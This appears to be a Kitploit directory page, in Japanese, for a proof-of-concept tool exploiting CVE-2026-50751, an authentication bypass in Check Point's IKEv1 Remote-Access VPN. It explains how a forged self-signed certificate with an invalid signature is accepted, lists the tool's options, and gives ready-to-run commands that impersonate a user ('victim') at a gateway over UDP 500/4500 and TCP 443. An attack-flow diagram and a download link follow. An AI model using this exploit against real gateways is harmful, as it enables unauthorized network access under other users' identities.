Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-50751 — Check PointのRemote-Access VPN(IKEv1)における証明書認証のバイパス。 | Kitploit
ツール/GitHubGitHub/ull0a/cve-2026-50751
エクスプロイトフレームワーク脆弱性分析エクスプロイトネットワークセキュリティ暗号化ペネトレーションテスト認証レッドチーミングリモートアクセスツール
GitHubull0a/cve-2026-50751

CVE-2026-50751

Check PointのRemote-Access VPN(IKEv1)における証明書認証のバイパス。

127時間43分前未レビュー
リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-50751 — PoC

Check Point の Remote-Access VPN (IKEv1) における証明書認証バイパス。

説明

CVE-2026-50751 は Check Point の iked デーモンに存在する認証バイパスであり、hotfix sk185033 が適用されていない R81.10、R82、R82.10 に存在します。この脆弱性により、プロビジョニングされた任意の Remote Access ユーザーとして、秘密鍵・パスワード・有効な証明書なしで認証することが可能になります。

脆弱な iked は Vendor ID VPNExtFeatures (ビット 0x4) からフラグを読み取り、それが有効な場合に verify_peer_auth / verifyMessagePhase1 を省略します。その結果:

証明書の署名(所持証明)が検証されない。

信頼チェーンが検証されない。

subject DN がプロビジョニングされたユーザーに解決されることのみが確認される。

CN= が対象ユーザーと一致する自己署名証明書を偽造し、無効な署名とともに送信するだけで十分です。ゲートウェイがフェーズ 1 を受け入れた場合、そのユーザーとして認証されたことになります(ISAKMP SA はその DN の下に保存されます)。

これは IKE (UDP 500/4500) 上および Visitor Mode (TCPT, TCP 443) 上で動作します。

使用法

構文

root@kitploit:~
cve-2026-50751 -host <IP|hostname> -user <username> [opciones]

オプション

Flag説明デフォルト
-hostゲートウェイの IP または hostname (必須)—
-userなりすます RA ユーザー名 (必須)—
-portポート: 500、4500 (UDP) または 443 (TCPT)500
-orgICA の組織 (O=)。省略した場合、TLS 証明書から導出される—
-ouユーザーの組織単位 (OU=)users
-timeout操作ごとのタイムアウト6s
-retriesmsg1 の再試行回数1
-v詳細出力false

例

UDP/500 による基本的な攻撃

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 500 -user victim -v

Visitor Mode TCPT/443

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -port 443 -user victim -v

組織を導出せずに強制指定する

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -user victim -org "ACME Corp" -ou vpn -v

NAT-T (UDP/4500) 上

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 4500 -user victim -v

攻撃フロー

root@kitploit:~
Atacante                                             Gateway (iked vulnerable)
   │                                                          │
   │─── msg1: SA (RSA-SIG) + VPNExtFeatures VID (bit 0x4) ───▶│
   │                                                          │  Lee flag 0x4
   │                                                          │  Marca verify_peer_auth = skip
   │◀── msg2: SA aceptado ────────────────────────────────────│
   │                                                          │
   │─── msg3: KE (g^xi) + Ni ────────────────────────────────▶│
   │◀── msg4: KE (g^xr) + Nr ─────────────────────────────────│
   │                                                          │
   │  Deriva SKEYID, SKEYID_e, IV                             │
   │                                                          │
   │─── msg5 (cifrado): ID=DN forjado + CERT autofirmado     │
   │                    + firma aleatoria ───────────────────▶│
   │                                                          │  Omite verificación
   │                                                          │  de firma
   │                                                          │  Resuelve DN → usuario
   │◀── msg6 (cifrado): SA establecida ───────────────────────│
   │                                                          │
   │  Descifra msg6 con SKEYID_e → prueba de autenticación    │

ツールをダウンロード